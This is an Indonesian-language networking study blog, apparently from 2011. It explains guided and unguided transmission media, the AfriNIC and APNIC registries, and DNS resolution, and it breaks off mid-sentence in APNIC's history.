Media Transmisi Data dibagi menjadi 2 bagian. Yaitu : 1. Media Transmisi Guided 2. Media Transmisi Unguided
Media transmisi yang terpandu maksudnya adalah media yang mampu mentransmisikan besaran-besaran fisik lewat materialnya. Contoh: kabel twisted-pair, kabel coaxial dan serat optik.
1. Twisted Pair
Kabel twisted-pair terdiri atas dua jenis yaitu shielded twisted pair biasa disebut STP dan unshielded twisted pair (tidak memiliki selimut) biasa disebut UTP.
Kabel twisted-pair terdiri atas dua pasang kawat yang terpilin. Twisted-pair lebih tipis, lebih mudah putus, dan mengalami gangguan lain sewaktu kabel terpuntir atau kusut. Keunggulan dari kabel twisted-pair adalah dampaknya terhadap jaringan secara keseluruhan: apabila sebagian kabel twisted-pair rusak, tidak seluruh jaringan terhenti, sebagaimana yang mungkin terjadi pada coaxial. Kabel twisted-pair terbagi atas dua yaitu: - Shielded Twisted-Pair (STP)
- Unshielded Twisted-Pair (UTP)
a. Shielded Twisted -Pair (STP)
Kabel STP mengkombinasikan teknik-teknik perlindungan dan antisipasi tekukan kabel. STP yang peruntukan bagi instalasi jaringan ethernet, memiliki resistansi atas interferensi elektromagnetik dan frekuensi radio tanpa perlu meningkatkan ukuran fisik kabel. Kabel Shielded Twister-Pair nyaris memiliki kelebihan dan kekurangan yang sama dengan kabel UTP. Satu hal keunggulan STP adalah jaminan proteksi jaringan dari interferensi-interferensi eksternal, sayangnya STP sedikit lebih mahal dibandingkan UTP.
Tidak seperti kabel coaxial, lapisan pelindung kabel STP bukan bagian dari sirkuit data, karena itu perlu diground pada setiap ujungnya. Pada prakteknya, melakukan ground STP memerlukan kejelian. Jika terjadi ketidaktepatan, dapat menjadi sumber masalah karena bisa menyebabkan pelindung bekerja sebagai layaknya sebuah antenna; menghisap sinyal-sinyal elektrik dari kawat-kawat dan sumber-sumber elektris lain disekitarnya. Kabel STP tidak dapat dipakai dengan jarak lebih jauh sebagaimana media-media lain (seperti kabel coaxial) tanpa bantuan device penguat (repeater).
- Kecepatan dan keluaran: 10-100 Mbps
- Biaya rata-rata per node: sedikit mahal dibadingkan UTP dan coaxial
- Media dan ukuran konektor: medium
- Panjang kabel maksimum yang diizinkan : 100m (pendek).
b. Unshielded Twisted-Pair
Untuk UTP terdapat pula pembagian jenis yakni:
Category 1 : sifatnya mampu mentransmisikan data kecepatan rendah. Contoh: kabel telepon.
Category 2 : sifatnya mampu mentransmisikan data lebih cepat dibanding category 1. Dapat digunakan untuk transmisi digital dengan bandwidth hingga 4 MHz.
Category 3 : mampu mentransmisikan data hingga 16 MHz.
Category 4 : mamu mentransmisikan data hingga 20 MHz.
Category 5 : digunakan untuk transmisi data yang memerlukan bandwidth hingga 100 MHz.
Secara fisik, kabel Unshielded Twisted-Pair terdiri atas empat pasang kawat medium. Setiap pasang dipisahkan oleh lapisan pelindung. Tipe kabel ini semata-mata mengandalkan efek konselasi yang diproduksi oleh pasangan-pasangan kawat, untuk membatasi degradasi sinyal. Seperti halnya STP, kabel UTP juga harus mengikuti rule yang benar terhadap beberapa banyak tekukan yang diizinkan perkaki kabel. UTP digunakan sebagai media networking dengan impedansi 100 Ohm. Hal ini berbeda dengan tipe pengkabelan twister-pair lainnya seperti pengkabelan untuk telepon. Karena UTP memiliki diameter eksternal 0,43 cm, ini menjadikannya mudah saat instalasi. UTP juga mensuport arsitektur-arsitektur jaringan pada umumnya sehingga menjadi sangat popular.
Kecepatan dan keluaran: 10 – 100 Mbps Biaya rata-rata per node: murah Media dan ukuran: kecil Panjang kabel maksimum yang diizinkan : 100m (pendek).
Kabel UTP memiliki banyak keunggulan. Selain mudah dipasang, ukurannya kecil, juga harganya lebih murah dibanding media lain. Kekurangan kabel UTP adalah rentang terhadap efek interferensi elektris yang berasal dari media atau perangkat-perangkat di sekelilingnya. Meski begitu, pada prakteknya para administrator jaringan banyak menggunakan kabel ini sebagai media yang efektif dan cukup diandalkan.
2. Kabel Coaxial
Kabel coaxial atau popular disebut “coax” terdiri atas konduktor silindris melingkar, yang menggelilingi sebuah kabel tembaga inti yang konduktif. Untuk LAN, kabel coaxial menawarkan beberapa keunggulan. Diantaranya dapat dijalankan dengan tanpa banyak membutuhkan bantuan repeater sebagai penguat untuk komunikasi jarak jauh diantara node network, dibandingkan kabel STP atau UTP. Repeater juga dapat diikutsertakan untuk meregenerasi sinyal-sinyal dalam jaringan coaxial sehingga dalam instalasi network cukup jauh dapat semakin optimal. Kabel coaxial juga jauh lebih murah dibanding Fiber Optic, coaxial merupakan teknologi yang sudah lama dikenal. Digunakan dalam berbagai tipe komuniksai data sejak bertahun-tahun, baik di jaringan rumah, kampus, maupun perusahaan.
Kecepatan dan keluaran: 10 -100 Mbps Biaya rata-rata per node: murah Media dan ukuran konektor: medium Panjang kabel maksimum: 200m (disarankan 180m) untuk thin-coaxial dan 500m untuk thick-coaxial
Saat bekerja dengan kabel, penting bagi kita untuk mempertimbangkan ukurannya; seperti ketebalan, diameter, pertambahan kabel sehingga akan menjadi pertimbangan atas kesulitan saat instalasi dilapangan. Kita juga harus ingat bahwa kabel akan mengalami tarikan-tarikan dan tekukan di dalam pipa. Kabel coaxial datang dalam beragam ukuran. Diameter terbesar diperuntukkan sebagai backbone Ethernet karena secara historis memiliki ketahanan transmisi dan daya tolak interferensi yang lebih besar. Tipe kabel coaxial ini sering disebut dengan thicknet, namun dewasa ini sudah banyak ditinggalkan. Kabel coaxial lebih mahal saat diinstal dibandingkan kabel twisted-pair.
3. Fiber Optic
Kabel fiber optic merupakan media networking yang mampu digunanakan untuk transmisi-transmisi modulasi. Jika dibandingkan media-media lain, fiber optic memiliki harga lebih mahal, tetapi cukup tahan terhadap interferensi elektromagnetis dan mampu beroperasi dengan kecepatan dan kapasitas data yang tinggi. Kabel fiber optic dapat mentransmisikan puluhan juta bit digital perdetik pada link kabel optic yang beroperasi dalam sebuah jaingan komersial. Ini sudah cukup utnuk mengantarkan ribuan panggilan telepon.
Beberapa keuntungan kabel fiber optic:
Kecepatan: jaringan-jaringan fiber optic beroperasi pada kecepatan tinggi, mencapai gigabits per second
Bandwidth: fiber optic mampu membawa paket-paket dengan kapasitas besar.
Distance: sinyal-sinyal dapat ditransmisikan lebih jauh tanpa memerlukan perlakuan “refresh” atau “diperkuat”.
Resistance: daya tahan kuat terhadap imbas elektromagnetik yang dihasilkan perangkat-perangkat elektronik seperti radio, motor, atau bahkan kabel-kabel transmisi lain di sekelilingnya.
Maintenance: kabel-kabel fiber optic memakan biaya perawatan relative murah.
Tipe-tipe kabel fiber optic:
Kabel single mode merupakan sebuah serat tunggal dari fiber glass yang memiliki diameter 8.3 hingga 10 micron. (satu micron besarnya sekitar 1/250 tebal rambut manusia) Kabel multimode adalah kabel yang terdiri atas multi serat fiber glass, dengan kombinasi (range) diameter 50 hingga 100 micron. Setiap fiber dalam kabel multimode mampu membawa sinyal independen yang berbeda dari fiber-fiber lain dalam bundel kabel. Plastic Optical Fiber merupakan kabel berbasis plastic terbaru yang memiliki performa familiar dengan kabel single mode, tetapi harganya sedikit murah.
Kontruksi kabel fiber optic
Core: bagian ini merupakan medium fisik utama yang mengangkut sinyal-sinyal data optical dari sumber ke device penerima. Core berupa helai tunggal dari glass atau plastik yang kontinyu (dalam micron). Semakin beasr ukuran core, semakin banyak data yang dapat diantarkan. Semua kabel fiber optic diukur mengacu pada diameter core-nya. Cladding: merupakan lapisan tipis yang menyelimuti fiber core. Coating: adalah lapisan plastik yang menyelimuti core dan cladding. Penyangga coating ini diukur dalam micron dan memilki range 250 sampai 900 micron. Strengthening fibers: terdiri atas beberapa komponen yang dapat menolong fiber dari benturan kasar dan daya tekan tak terduga selama instalasi Cable jacket: merupakan lapisan terluar dari keseluruhan badan kabel.
Media unguided mentransmisikan gelombang electromagnetic tanpa menggunakan konduktor fisik seperti kabel atau serat optik. Contoh sederhana adalah gelombang radio seperti microwave, wireless mobile dan lain sebagainya.
1. Media ini memerlukan antena untuk transmisi dan penerimaan (transmiter dan receiver)
2. Ada dua jenis transmisi
Point-to-point (unidirectional) yaitu dimana pancaran terfokus pada satu sasaran Broadcast (omnidirectioanl) yaitu dimana sinyal terpancar ke segala arah dan dapat diterima oleh banyak antena
3. Tiga macam wilayah frekuensi
Gelombang mikro (microwave) 2 – 40 Ghz Gelombang radio 30 Mhz – 1 Ghz Gelombang inframerah
Untuk media tidak terpandu (unguided), transmisi dan penerimaan dapat dicapai dengan menggunakan antena. Untuk transmisi, antena mengeluarkan energi elektromagnetik ke medium (biasanya udara) dan untuk penerimaan, antena mengambil gelombang elektomagnetik dari medium sekitarnya. Media transmisi tidak terpandu (unguided) terbagi atas empat bagian yaitu:
1. Gelombang Mikro Terrestrial (Atmosfir Bumi) 2. Gelombang Mikro Satelit 3. Radio Broadcast 4. Infra Merah 1. Gelombang Mikro Terrestrial Deskripsi Fisik Tipe antena gelombang mikro yang paling umum adalah parabola ‘dish’. Ukuran diameternya biasanya sekitar 3 m. Antena pengirim memfokuskan sinar pendek agar mencapai transmisi garis pandang menuju antena penerima. Antena gelombang mikro biasanya ditempatkan pada ketinggian tertentu diatas tanah untuk memperluas jarak antara antena dan mampu menembus batas. Untuk mencapai transmisi jarak jauh, diperlukan beberapa menara relay gelombang mikro, dan penghubung gelombang mikro titik ke titik dipasang pada jarak tertentu. Aplikasi Kegunaan sistem gelombang mikro yang utama adalah dalam jasa telekomunikasi long-haul, sebagai alternative untuk coaxial cable atau serat optic. Fasilitas gelombang mikro memerlukan sedikit amplifier atau repeater daripada coaxial cable pada jarak yang sama, namun masih memerlukan transmisi garis pandang. Gelombang mikro umumnya dipergunakan baik untuk transmisi televisi maupun untuk transmisi suara. Pengguna gelombang mikro lainnya adalah untuk jalur titik-titik pendek antara gedung. Ini dapat digunakan untuk jaringan TV tertutup atau sebagai jalur data diantara Local Area Network. Gelombang mikro short-haul juga dapat digunakan untuk aplikasi-aplikasi khusus. Untuk keperluan bisnis dibuat jalur gelombang mikro untuk fasilitas telekomunikasi jarak jauh untuk kota yang sama, melalui perusahaan telepon local. Krakteristik-karakteristik transmisi Transmisi gelombang mikro meliputi bagian yang mendasar dari spectrum elektromagnetik. Frekuensi yang umum di gunakan untuk transmisi ini adalah rentang frekuensi sebesar 2 sampai 40 GHz. Semakin tinggi frekuensi yang digunakan semakin tinggi potensial bandwidth dan berarti pula semakin tinggi rate data-nya. Sama halnya dengan beberapa sistem transmisi, sumber utama kerugian adalah atenuansi. Sehingga repeater dan amplifier ditempatkan terpisah jauh dari sistem gelombang mikro biasanya 10 sampai 100 km. Atenuansi meningkat saat turun hujan khusunya tercatat diatas 10 GHz. Sumber gangguan-gangguan yang lain adalah interferensi. Dengan semakin berkembangnya popularitas gelombang mikro, daerah transmisi saling tumpang tindih dan interferensi merupakan suatu ancaman. Karena itu penetapan band frekuensi diatur dengan ketat. Band yang paling umum untuk sistem telekomunikasi long-haul adalah band 4 GHz sampai 6 GHz. Dengan meningkatkan kongesti (kemacetan) pada frekuensi-frekuensi ini, sekarang digunakan band 11 GHz. Band 12 GHz digunakan sebagai komponen sistem TV kabel. Saluran gelombang mikro juga digunakan untuk menyediakan sinyal-sinyal TV untuk instalasi CATV local; sinyal-sinyal yang kemudian didistribusikan kepelanggan melalui kabel coaxial. Sedangkan gelombang mikro dengan frekuensi lebih tinggi digunakan untuk saluran titik ke titik pendek antar gedung. Biasanya digunakan band 22 GHz. Frekuensi gelombang mikro yang lebih tinggi lagi tidak efektif untuk jarak yang lebih jauh, akibat meningkatnya atenuansi, namun sangat sesuai untuk jarak pendek. Sebagai tambahan, semakin tinggi frekuensi, antenanya akan semakin kecil dan murah. 2. Gelombang Mikro Satelit Deskripsi fisik Satelit komunikasi adalah sebuah stasiun relay gelombang mikro. Dipergunakan untuk menghubungkan dua atau lebih transmitter/receiver gelombang mikro pada bumi, yang dikenal sebagai stasiun bumi atau ground station. Satelit menerima transmisi diatas satu band frekuensi (uplink), amplifier dan mengulang sinyal-sinyal, lalu mentransmisikannya ke frekuensi yang lain (downlink). Sebuah satelit pengorbit tunggal akan beroperasi pada beberapa band frekuensi, yang disebut sebagai transponder channel, atau singkatnya transponder. Ada dua konfigurasi umum untuk komunikasi satelit yang popular yaitu: Satelit digunakan untuk menyediakan jalur titik-ke titik diantara dua antena dari dua stasiun bumi Satelit menyediakan komunikasi antara satu transmitter dari stasiun bumi dan sejumlah receiver stasiun bumi. Agar komunikasi satelit bisa berfungsi efektif, biasanya diperlukan orbit stasioner dengan memperhatikan posisinya diatas bumi. Sebaliknya, stasiun bumi tidak harus saling berada digaris pandang sepanjang waktu. Untuk mrnjadi stasioner, satelit harus memiliki periode rotasi yang sama dengan periode rotasi bumi. Kesesuaian ini terjadi pada ketinggian 35.784 km. Dua satelit yang menggunakan band frekuensi yang sama, bila keduanya cukup dekat, akan saling mengganggu. Untuk menghindari hal ini, standar-standar terbaru memerlukan 4 derajat ruang. Aplikasi Satelit komunikasi merupakan suatu revolusi dalam teknologi komunikasi dan sama pentingnya dangan serat optic. Aplikasi-aplikasi terpenting untuk satelit lainnya diantaranya adalah: Distribusi siaran televisi Transmisi telepon jarak jauh Jaringan bisnis swasta Beberapa karakteristik komunikasi satelit dapat diuraikan sebagai berikut: akibat jarak yang panjang terdapat penundaan penyebaran (propagation delay) kira-kira seperempat detik dari transmisi dari suatu stasiun bumi untuk di tangkap oleh stasiun bumi lain. Disamping itu muncul masalah-masalah yang berkaitan dengan control error dan flow control. gelombang mikro merupakan sebuah fasilitas penyiaran, dan ini sudah menjadi sifatnya. Bebarapa stasiun dapat mentransmisikan ke satelit, dan transmisi dari satelit dapat diterima oleh beberapa stasiun. Karena sifat siarannya, satelit sangat sesuai untuk distrbusi siaran televisi dan dipergunakan secara luas di seluruh dunia. Menurut penggunaan cara lama, sebuah jaringan menyediakan pemrograman dari suatu lokasi pusat. Program-program ditransmisikan ke satelit dan kemudian disiarkan ke sejumlah stasiun, dimana kemudian program tersebut didistribusikan ke pemirsa. Satu jaringan, public broadcasting service (PBS) mendistribusikan program televisinya secara eksklusif dengan menggunakan channel satelit, yang kemudian diikuti oleh jaringan komersial lainnya, serta sistem televisi berkabel yang menerima porsi besar dari program-program mereka dari satelit. Aplikasi teknologi satelit terbaru untuk distribusi televisi adalah direct broadcast satellite (DBS), dimana pada aplikasi tersebut sinyal-sinyal video satelit ditransmisikan secara langsung kerumah-rumah pemirsa. Karena mengurangi biaya dan ukuran antena penerima, maka DBS dianggap sangat visible, dan sejumlah channel mulai disiapkan atau sedang dalam taraf perencanaan. Transmisi satelit juga dipergunakan untuk titik ke titik antar sentral telepon pada jaringan telepon umum. Juga merupakan media yang optimum untuk kegunaan luas dalam sambungan langsung internasional dan mampu bersaing dengan sistem terrestrial untuk penghubung internasional jarak jauh. Juga terdapat sejumlah apliksi data bisnis untuk satelit. Provider satelit membagi kapasitas total menjadi beberapa channel dan menyewakan channel itu kepada user bisnis individu. Satu user dilengkapi dengan antena pada sejumlah situs yang dapat menggunakan channel satelit untuk jaringan swasta. Biasanya, aplikasi-aplikasi semacam itu sangat mahal dan terbatas untuk organisasi-organisasi yang lebih besar dengan peralatan canggih. Sebuah hasil untuk pengembangan baru dalam hal ini adalah sistem Very Small Aperture Terminal (VSAT), yang menyediakan alternatif biaya murah. Dengan mengacu pada beberapa aturan, stasiun-stasiun ini menbagi kapasitas transmisi satelit dari suatu stasiun pusat. Stasiun pusat dapat saling mengirimkan pesan dengan setiap pelanggannya serta dapat merelay pesan-pesan tersebut di antara pelanggan. Karakteristik-karakteristik Transmisi Jangkauan transmisi optimum untuk transmisi satelit adalah berkisar pada 1 sampai 10 GHz. Dibawah 1 GHz, terdapat derau yang berpengaruh dari alam, meliputi derau dari galaksi, matahari, dan atmosfer, serta interferensi buatan manusia, dari berbagai perangkat elektronik. Diatas 10 GHz, sinyal-sinyal akan mengalami atenuansi yang parah akibat penyerapan dan pengendapan di atmosfer. Saat ini sebagian besar satelit menyediakan layanan titik ke titik dengan menggunakan bandwidth frekuensi berkisar antara 5,925 sampai 6,425 GHz untuk transmisi dari bumi ke satelit (uplink) dan bandwidth frekuensi 4,7 sampai 4,2 GHz untuk transmisi dari satelit ke bumi (downlink). Kombinasi ini di tunjukkan sebagai band 4/6 GHz. Patut dicatat bahwa frekuensi uplink dan downlink berbeda. Sebuah satelit tidak dapat menerima dan mentransmisi dengan frekuensi yang sama pada kondisi operasi terus-menerus tanpa interferensi. Jadi, sinyal-sinyal yang diterima dari suatu stasiun bumi pada satu frekuensi harus ditransmisikan kembali dengan frekuensi yang lain. Band 4/6 GHz berada dalam zona optimum 1 sampai 10GHz, namun menjadi penuh. Frekuensi-frekuensi lain pada rentang tersebut tidak tersedia karena interferensi juga beroperasi pada frekuensi-frekuensi itu, biasanya gelombang mikro terrestrial. Karenanya, band 12/14 lebih dikembangkan lagi (uplink:14 sampai 14,5 GHz ; downlink: 11,7 sampai a4,2 GHz). Pada band frekuensi ini, masalah-masalah mulai datang. Untuk itu, digunakan stasiun bumi penerima yang lebih kecil sekaligus lebih murah. Ini untuk mengantisipasi band ini juga menjadi penuh, dan penggunanya dirancang untuk band 19/29 GHz. (uplink 27,5 sampai 31.0 GHz; downlink: 17,7 sampai 21,2 GHz). Band ini mengalami masalah-masalah atenuansi yang lebih besar namun akan memungkinkan band yang lebih lebar (2500 MHz sampai 500 MHz). 3. Radio Broadcast Deskripsi fisik Perbedaan-perbedaan utama diantara siaran radio dan gelombang mikro yaitu, dimana siaran radio bersifat segala arah (broadcast) sedangkan gelombang mikro searah (point-to-point). Karena itu, siaran radio tidak memerlukan antena parabola, dan antena tidak perlu mengarah ke arah persis sumber siaran Aplikasi Radio merupakan istilah yang biasa digunakan untuk menangkap frekuensi dalam rentang antara 3 kHz sampai 300 GHz. Kita menggunakan istilah yang tidak formal siaran radio untuk band VHF dan sebagian dari band UHF: 30 MHz sampai 1 GHz. Rentang ini juga digunakan untuk sejumlah aplikasi jaringan data. Karakteristik-karakteristik Transmisi Rentang 30 MHz sampai 1 GHz merupakan rentang yang efektif untuk komunikasi broadcast. Tidak seperti k asus untuk gelombang elektromagnetik berfrekuensi rendah, ionosfer cukup trasparan untuk gelombang radio diatas 30 MHz. jadi transmisi terbatas pada garis pandang, dan jarak transmitter tidak akan mengganggu satu sama lain dalam arti tidak ada pemantulan dari atmosfer. Tidak seperti frekuensi yang lebih tinggi dari zona gelombang mikro, gelombang siaran radio sedikit sensitive terhadap atenuansi saat hujan turun. Karena gelombangnya yang panjang maka, gelombang radio relative lebih sedikit mengalami atenuansi. Sumber gangguan utama untuk siaran radio adalah interferensi multi-jalur. Pantulan dari bumi, air, dan alam atau obyek-obyek buatan manusia dapat menyebabkan terjadinya multi-jalur antar antena. Efek ini nampak jelas saat penerima TV menampilkan gambar ganda saat pesawat terbang melintas. 4. Infra Merah Komunikasi infra merah dicapai dengan menggunakan transmitter/receiver (transceiver) yang modulasi cahaya yang koheren. Transceiver harus berada dalam jalur pandang maupun melalui pantulan dari permukaan berwarna terang misalnya langit-langit rumah. Satu perbedaan penting antara transmisi infra merah dan gelombang mikro adalah transmisi infra merah tidak dapat melakukan penetrasi terhadap dinding, sehingga masalah-masalah pengamanan dan interferensi yang ditemui dalam gelombang mikro tidak terjadi. Selanjutnya, tidak ada hal-hal yang berkaitan dengan pengalokasian frekuensi dengan infra merah, karena tidak diperlukan lisensi untuk itu. Pada handphone dan PC, media infra merah ini digunakan untuk mentransfer data tetapi dengan suatu standar atau protocol tersendiri yaitu protocol IrDA. Cahaya infra merah merupakan cahaya yang tidak tampak. Jika dilihat dengan spektroskop cahaya maka radiasi cahaya infra merah akan nampak pada spektruk elektromagnetik dengan panjang gelombang diatas panjang gelombang cahaya merah.
Senin, 28 Februari 2011
Media Transmisi Data
Jumat, 25 Februari 2011
AfriNIC (African Network Information Center)
AfriNIC (African Network Information Center) adalah Regional Internet Registry (RIR) untuk Afrika. AfriNIC, yang berkantor pusat di Ebene City, Mauritius, untuk sementara diakui oleh ICANN pada 11 Oktober 2004 dan menjadi fungsional operasional pada 22 Februari 2005. Itu diakui oleh ICANN pada bulan April 2005. Sebelumnya, alamat IP untuk Afrika didistribusikan oleh APNIC, ARIN, dan RIPE NCC. [1] AfriNIC telah dialokasikan alamat IPv4 blok 41.0.0.0 / 8, 196.0.0.0 / 8 dan 197.0.0.0 / 8 dan IPv6 blok 2c00:: / 12 dan 2001:4200:: / 23. Adiel AKPLOGAN, sebuah Togo Nasional, adalah CEO registri.
Negara * Aljazair * Angola * Benin * Botswana * Burkina Faso * Burundi * Republik Kongo * Kamerun * Cape Verde * Republik Afrika Tengah * Chad * Komoro * Republik Demokratik Kongo * Pantai Gading * Djibouti * Mesir * Equatorial Guinea * Eritrea * Ethiopia * Gabon * Gambia * Ghana * Guinea * Guinea-Bissau * Kenya * Lesotho * Liberia * Libya * Madagaskar * Malawi * Mali * Mauritania * Mauritius * Mayotte * Maroko * Mozambik * Namibia * Niger * Nigeria * Reunion Island * Rwanda * Sao Tome dan Principe * Senegal * Seychelles * Sierra Leone * Somaliland * South Africa * Sudan * Swaziland * Tanzania * Togo * Tunisia * Uganda * Sahara Barat * Zambia * Zimbabwe
Diagram kerja DNS
Dimisalkan ada client yang menanyakan "berapa alamat ip dari www.itb.ac.id ?" Pertanyaan ini dilemparkan ke DNS server lokal. Dengan segera DNS server lokal memeriksa databasenya. Kemudian ternyata www.itb.ac.id tidak terdapat didalam databasenya. Lalu ia memeriksa cache. Bila ada, jawaban lansung diberikan ke client. Tapi bila tidak ada, maka ia akan mencari jawabannya ke root DNS. Root DNS pasti mempunyai database yang dimaksud dan memberikannya ke DNS server local dan pada akhirnya diberikan ke client tadi.
Root DNS ini memuat seluruh daftar nama yang ada di dunia. Dan Root DNS ini tidak hanya terdiri dari satu server melainkan sekitar 13 server yang diletakkan di seluruh dunia. Secara garis besar pembagian domain dunia memakai dua jenis. Yang pertama berdasarkan jenis institusi, antara lain : · .com untuk organisasi komersial · .org untuk organisasi non-komersial · .edu untuk institusi pendidikan · .gov untuk organisasi pemerintahan · .mil untuk kalangan militer · .net untuk penyelenggara jasa internet Jenis pembagian kedua adalah berdasarkan negara , misalnya indonesia adalah .id. Sebenarnya domain negara akan digagi lagi menjadi sub-domain berdasarkan jenis institusi. Kita ambil contoh untuk negara kita ,domain id dibagi lagi menjadi beberapa subdomain, antaralain : · .co.id, contoh :republika.co.id · .ac.id contoh :itb.ac.id · or.id contoh : linux.or.id · go.id contoh : depnaker.go.id · mil.id contoh: kopassus.mil.id dan di Indonesia diubah sedikit menjadi : co.id .or.id ac.id .go.id dan mil.id . Pembagian ini didasarkan kepada jenis institusi yang meminta nama domain. Selain itu, penyusunan domain dibuat bertingkat dan mempunyai hirarki tertentu. Domain-domain diseluruh dunia sangat banyak dan tidak mungkin semuanya ditampung oleh ROOT DNS. ROOT DNS hanya memegang 'kepala' dari domain tertentu. Proses “request” ke DNS server dapat dianalogikan sebagai berikut: Menteri Pendidikan Nasional ditanyai oleh Dubes Afganistan tentang kondisi pendidikan di jurusan teknik elektro ITB. Tentunya pak menteri tidak tahu persis tentang kondisi jurusan tersebut, oleh karena itu ia menghubungi rektor ITB yang merupakan bawahan beliau. Kemudian pak rektor menghubungi ketua Fakultas Teknologi Industri yang membawahi jurusan teknik elektro . Ketua fakultas kemudian menghubungi ketua jurusan teknik elektro. Nah ketua jurusan tersebutlah yang akan menjawab pertanyaan tersebut. Yang perlu diperhatikan adalah bahwa ketua jurusan menjawab pertanyaan bukan beradasrkan permintaan sang dubes tetapi berdasarkan permintaan ketua fakultas , ketua fakultas dari rektor dan seterusnya. Menurut analogi diatas mendiknas sebagai ROOT DNS, rektor ITB adalah DNS yang memegang domain .id dan ketua Fakultas Teknologi Industri adalah yang membawahi domain ac.id . Dalam kasus ini ROOT DNS hanya tahu kemana mencari DNS server yang menangani penerjemahan domain .id, dia tidak tahu dimana dimana DNS server yang menangani domain ac.id. DNS yang menangani domain .id tahu kemana mencari DNS server yang melayani domain ac.id , DNS server yang menangani domain ac.id tahu kemana mencari DNS server yang menangani domain itb.ac.id dan seterusnya . Dari sini terlihat ada pendelegasian tugas dari atas ke bawah.
Asia Pacific Network Information Centre (APNIC)
Asia Pacific Network Information Centre (APNIC) adalah Regional Internet Registry untuk kawasan Asia Pasifik. APNIC menyediakan jumlah alokasi sumber daya dan layanan registrasi yang mendukung operasi global Internet. Ini adalah bukan untuk mencari keuntungan, organisasi berbasis keanggotaan yang anggotanya termasuk Internet Service Provider, Internet Registries Nasional, dan organisasi serupa.
APNIC fungsi utama adalah: * Mengalokasikan IPv4 dan IPv6 address space, dan Autonomous System Numbers * Memelihara Database Whois publik untuk wilayah Asia Pasifik * Reverse DNS delegasi * Mewakili kepentingan komunitas internet Asia Pasifik di panggung global Pertemuan Kebijakan Terbuka Setiap tahun, APNIC mengadakan dua pertemuan kebijakan terbuka. Ini memberikan kesempatan masyarakat untuk datang bersama-sama untuk pengembangan kebijakan, pengambilan keputusan, pendidikan, pertukaran informasi, dan jaringan - baik profesional dan sosial. Kebijakan Terbuka pertama setiap tahun Rapat diselenggarakan sebagai jejak konferensi Asia Pacific Regional Internet Conference on Operational Technologies (APRICOT), dan yang kedua adalah sebagai standalone diadakan pertemuan. Pertemuan diadakan di berbagai lokasi di seluruh Asia Pasifik dan sering melibatkan unsur-unsur budaya ekonomi negara tuan rumah. Pelatihan APNIC APNIC mengadakan beberapa kursus pelatihan di berbagai lokasi di seluruh wilayah. Kursus-kursus ini dirancang untuk mendidik peserta untuk mahir mengkonfigurasi, mengelola dan memberikan layanan internet mereka dan infrastruktur dan untuk menerima praktek-praktek terbaik saat ini. Whois Database Database Whois APNIC detail dari registrasi berisi alamat IP dan nomor AS awalnya dialokasikan oleh APNIC. Ini menunjukkan organisasi-organisasi yang memegang sumber daya, di mana alokasi dibuat, dan rincian kontak untuk jaringan. Organisasi yang memegang sumber daya yang bertanggung jawab untuk memperbarui informasi mereka dalam database. Basis data dapat dicari dengan menggunakan antarmuka web pada situs APNIC, atau dengan mengarahkan klien whois Anda whois.apnic.net (misalnya, whois-h whois.apnic.net 203.37.255.97). Spam, hacking, dll Setelah memanfaatkan Whois Database dalam upaya untuk menentukan siapa yang mungkin bertanggung jawab untuk mengirimkan spam atau mendapatkan akses tidak sah ke komputer mereka (hacking), banyak orang salah menafsirkan keliru apnic.net sebagai referensi untuk menunjukkan sumber spam atau upaya hacking. Orang-orang ini juga cenderung percaya bahwa APNIC memiliki kewenangan dan kekuasaan untuk mencegah jenis jaringan ini pelecehan. Kedua ini adalah kesalahpahaman. APNIC memainkan peran pasif, memberikan pelayanan yang baik dan terhormat Netizen pidana dalam suatu cara yang tidak menghakimi. APNIC ada semata-mata untuk melayani anggota-anggotanya, dan tidak terlibat dalam masalah Cybercrime kepolisian. Mitra APNIC bekerja sama dengan banyak organisasi Internet lainnya, termasuk: Keanggotaan APNIC Mayor Internet Service Provider (ISP), National Internet Registry (NIR) dan Pusat Informasi Jaringan (NIC). Lainnya Regional Internet Registry (RIR) ARIN (Amerika Utara), LACNIC (Amerika Latin dan Karibia), RIPE NCC (Eropa), dan AfriNIC (Afrika). The Number Resource Organization Dengan RIR lainnya, APNIC adalah anggota dari Number Resource Organization (NRO), yang ada untuk melindungi sumber daya nomor belum dialokasikan renang, untuk mempromosikan dan melindungi bottom-up proses pengembangan kebijakan, dan menjadi titik fokus input ke dalam sistem RIR. Internet terkemuka organisasi Ini termasuk IANA (IANA), Internet Corporation for Assigned Names and Numbers (ICANN), Internet Engineering Task Force (IETF), Internet Engineering Policy Group (IEPG), Internet Society (ISOC), dan lain-lain . Registri sebelumnya untuk Australia, yang dikenal sebagai AUNIC, sekarang dibubarkan, dan tanggung jawab yang dilakukan oleh APNIC. Sejarah APNIC didirikan pada tahun 1992 oleh Asia Pasifik Koordinator Komite Penelitian Intercontinental Networks (APCCIRN) dan Asia Pacific Engineering and Planning Group (APEPG). Kedua kelompok itu kemudian digabung dan berganti nama menjadi Kelompok Jaringan Asia Pasifik (APNG). Ini didirikan sebagai sebuah proyek percontohan untuk memberikan ruang alamat seperti yang didefinisikan oleh RFC-1366, dan juga mencakup singkat yang lebih luas: "Untuk memfasilitasi komunikasi, bisnis, dan budaya dengan menggunakan teknologi internet". Pada tahun 1993, APNG menemukan mereka tidak mampu menyediakan payung formal atau struktur hukum untuk APNIC, dan jadi pilot proyek ini menyimpulkan, tetapi APNIC terus eksis secara independen di bawah kekuasaan IANA sebagai 'proyek sementara'. Pada tahap ini, APNIC masih tidak memiliki hak-hak hukum, keanggotaan, dan struktur biaya. Pada tahun 1995, pelantikan diadakan pertemuan APNIC di Bangkok. Ini adalah pertemuan dua hari, dijalankan oleh para relawan, dan bebas untuk hadir. Sumbangan sukarela dicari sesuai dengan ukuran organisasi, mulai dari $ 1.500 untuk 'kecil', melalui ke $ 10.000 untuk 'besar'. Tiga anggota jenis didefinisikan oleh APNIC-001: ISP (lokal IR), Enterprise, dan Nasional. 1996 melihat struktur biaya yang layak diperkenalkan, pembentukan keanggotaan, dan penyelenggaraan pertemuan APRICOT pertama. 1997 Pada saat tiba, itu menjadi semakin jelas bahwa APNIC lingkungan setempat di Jepang membatasi pertumbuhan - misalnya, staf terbatas pada anggota 4-5. Oleh karena itu, perusahaan konsultan KPMG dikontrak untuk menemukan lokasi yang ideal di kawasan Asia Pasifik untuk APNIC markas baru. Untuk alasan-alasan seperti infrastruktur stabil, rendahnya biaya hidup dan operasi, dan keuntungan pajak bagi organisasi keanggotaan, Brisbane, Australia dipilih sebagai lokasi baru, dan relokasi selesai antara bulan April dan Agustus, 1998, sambil tetap menjaga seluruh operasi terus-menerus. Pada tahun 1999, relokasi itu selesai, krisis ekonomi Asia 